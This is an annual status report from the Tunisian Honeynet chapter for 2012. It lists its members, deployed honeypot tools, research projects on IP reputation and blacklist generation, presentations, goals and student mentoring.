Tunisian (Saherhoneynet) Chapter Status Report For 2012

Tunisian (Saherhoneynet) Chapter Status Report For 2012
 
ORGANIZATION
All team members belong to the staff of the National Agency for Computer Security and the Tunisian CERT; our chapter is opened for volunteers based on a special agreement, such as students, researchers, professional and partners.
List current chapter members and their activities:

  • Hafidh EL Faleh                               Tunisian Honeynet chapter lead.Cyber early warning system Team Manager.
  • Haythem EL MIR                            IT cyber-Security Consultant (Professional).
  • Hassen Bahri                                    tunCERT Manager
  • Marwen Ben Rached                    Cyber early warning system team member – Programmer
  • Jihene Ksiksi                                    Cyber early warning system team member – Support

List changes in the structure:

  • Tarek mouhamed                          CTO of  NACS /tunCERT. (New members)
  • Amine Rached                                 CSIRT (incident team) manager. (New members)
  • Amine Abid                                      CSIRT (incident team) support. ( New members)

 
DEPLOYMENTS
From the starting of the project, the team tried to be up-to-date in term of used technologies; they tested all detection and honyepotting tools and tried to choose the most reliable ones.
This a list current technology deployed:

  • SurfIDS
  • SMTP-HP
  • Kippo
  • Kippo-Graph
  • Dionaea
  • Glastopf
  • Honeynet Webviz
  • Cuckoo
  • HonEeeBox
  • Architecture:   http://www.honeynet.tn/rep/clip_image002.jpg
  • RESEARCH AND DEVELOPMENT

    Developed Projects

    • Conception a tool for analyzing URL and binaries founded in SSH input using result of kippo ssh-honeypot.

     

    Projects currently under research

    IP Reputation Dadabase

    • Designing and specifying a tool to interface with a lot of honeypot tools (dionaea, glastopf, kippo ..) and provide an update database to cheeck a reputation of any IP address related with her historic logs.
    • Provide an web access (web services) to this tool, automatic getting Ip source and providing information related her reputation historic and sending necessary instructions for cleanning process.

    Black-List Generator

    • Create an updated list for malicious domains and hosts from malwares offred.
    • Select Profile of equipments to generate ACL (Firewall, IDS/IPS, Proxy ..) .
    • Designing and specifying techniques for black-list tool.
    • Online sharing of black-list.

    FINDINGS

    Presentations:

    • HP Workshop 2012: Tunisian Chapter Update:

    Link: http://www.honeynet.tn/node/60

    • ITU Regional Workshop on “IMPACT Alert - Cyber Drill for Partner Countries”, Amman-Jordan, 15-17 July 2012

    The National Platform for Tracking Cyber Attacks "SAHER"
    http://www.itu.int/ITU-D/arb/ARO/2012/CyberDrill/Documents/doc10-Saher2012.pptx

    Workshop

     

    List possibilities to interact with Tunisian Chapter

    EMail:honeynet@ansi.tn

    WebSite:http://www.honeynet.tn

    Twitter:http://twitter.com/SaherHoneyNet

    LinkedIn: http://www.linkedin.com/groups/The-Honeynet-Project-Tunisia-chapter-4142905

    chapter page :http://www.honeynet.org/chapters/tunisian

    GOALS

    The main goals of Saher-HoneyNet are:

    • Detecting malicious activities and reporting to the relevant parties; by deploying a network of honeypot sensors and setting up secure communication channel for reporting. 
    • Providing assistance to the Tunisian users to clean their infected computers by providing all technical resources, online assistance and even on-site assistance in coordination with the incident response team of the tunCERT. 
    • Providing technical materials for the awareness activity in order to educate the national community on malware threat and how the mitigate infections.
    • Providing data and technical resources for the research activities in collaboration with universities. 
    • Developing technical guides for malware analysis, detection technologies and best practices to mitigate malware infections in coordination with the malware research centre of tunCERT. 
    • Coordinating with international security networks to share information related to malicious activities.

    MENTORING

    Supervision of trainees for students in universities:

    • Final project: solutions to detect viral attacks (Honeynet).
    • Final project: Development of a generation blacklist console.
    • Traineeship: deployment of sandbox platform..